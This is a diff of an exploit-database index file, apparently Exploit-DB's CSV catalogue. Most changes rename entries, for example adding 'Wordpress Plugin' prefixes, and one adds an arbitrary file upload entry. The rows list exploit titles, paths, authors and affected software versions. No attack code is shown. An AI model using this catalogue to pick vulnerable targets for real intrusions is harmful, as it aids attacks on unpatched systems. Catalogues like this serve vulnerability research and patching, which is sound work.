-25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 +25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 @@ -22959,6 +22968,7 @@ id,file,description,date,author,platform,type,port 33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 33420,platforms/php/webapps/33420.txt,"F3Site 2009 - mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 +40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection",2009-12-18,R3d-D3V!L,php,webapps,0 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 @@ -23618,7 +23628,7 @@ id,file,description,date,author,platform,type,port 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0 -26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 @@ -24442,7 +24452,7 @@ id,file,description,date,author,platform,type,port 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 -27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 +27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 @@ -25029,7 +25039,7 @@ id,file,description,date,author,platform,type,port 27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 -27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 +27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0 @@ -25503,7 +25513,7 @@ id,file,description,date,author,platform,type,port 28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 +28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 @@ -26110,7 +26120,7 @@ id,file,description,date,author,platform,type,port 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 -29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 +29020,platforms/php/webapps/29020.txt,"Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -26580,7 +26590,7 @@ id,file,description,date,author,platform,type,port 30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 30049,platforms/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 -30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 +30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 @@ -27632,7 +27642,7 @@ id,file,description,date,author,platform,type,port 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 -30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 +30637,platforms/php/webapps/30637.js,"Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 @@ -27652,7 +27662,7 @@ id,file,description,date,author,platform,type,port 30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0 30655,platforms/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 -30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0 +30656,platforms/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0 30657,platforms/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 @@ -30664,7 +30674,7 @@ id,file,description,date,author,platform,type,port 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,"cr4wl3r ",php,webapps,0 -33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 +33937,platforms/multiple/webapps/33937.txt,"Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0 33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 @@ -30819,7 +30829,7 @@ id,file,description,date,author,platform,type,port 34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 -34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 +34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 @@ -30971,7 +30981,7 @@ id,file,description,date,author,platform,type,port 34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0 -34294,platforms/php/webapps/34294.txt,"Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 +34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34297,platforms/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0 @@ -31085,7 +31095,7 @@ id,file,description,date,author,platform,type,port 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 -34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 +34424,platforms/php/webapps/34424.txt,"Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 @@ -31508,7 +31518,7 @@ id,file,description,date,author,platform,type,port 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 -34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 +34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 @@ -31861,7 +31871,7 @@ id,file,description,date,author,platform,type,port 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35287,platforms/php/webapps/35287.txt,"Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 @@ -31875,7 +31885,7 @@ id,file,description,date,author,platform,type,port 35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 -35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 +35303,platforms/php/webapps/35303.txt,"Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 @@ -31920,7 +31930,7 @@ id,file,description,date,author,platform,type,port 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 -35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 +35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -32012,7 +32022,7 @@ id,file,description,date,author,platform,type,port 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 -35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 +35447,platforms/php/webapps/35447.txt,"Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 @@ -32598,7 +32608,7 @@ id,file,description,date,author,platform,type,port 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 -36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 +36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 @@ -32623,7 +32633,7 @@ id,file,description,date,author,platform,type,port 36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 -36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 +36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 @@ -33106,7 +33116,7 @@ id,file,description,date,author,platform,type,port 36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 -36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36618,platforms/php/webapps/36618.txt,"Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0 @@ -33160,7 +33170,7 @@ id,file,description,date,author,platform,type,port 36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 -36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 +36674,platforms/php/webapps/36674.txt,"Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 @@ -33556,7 +33566,7 @@ id,file,description,date,author,platform,type,port 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 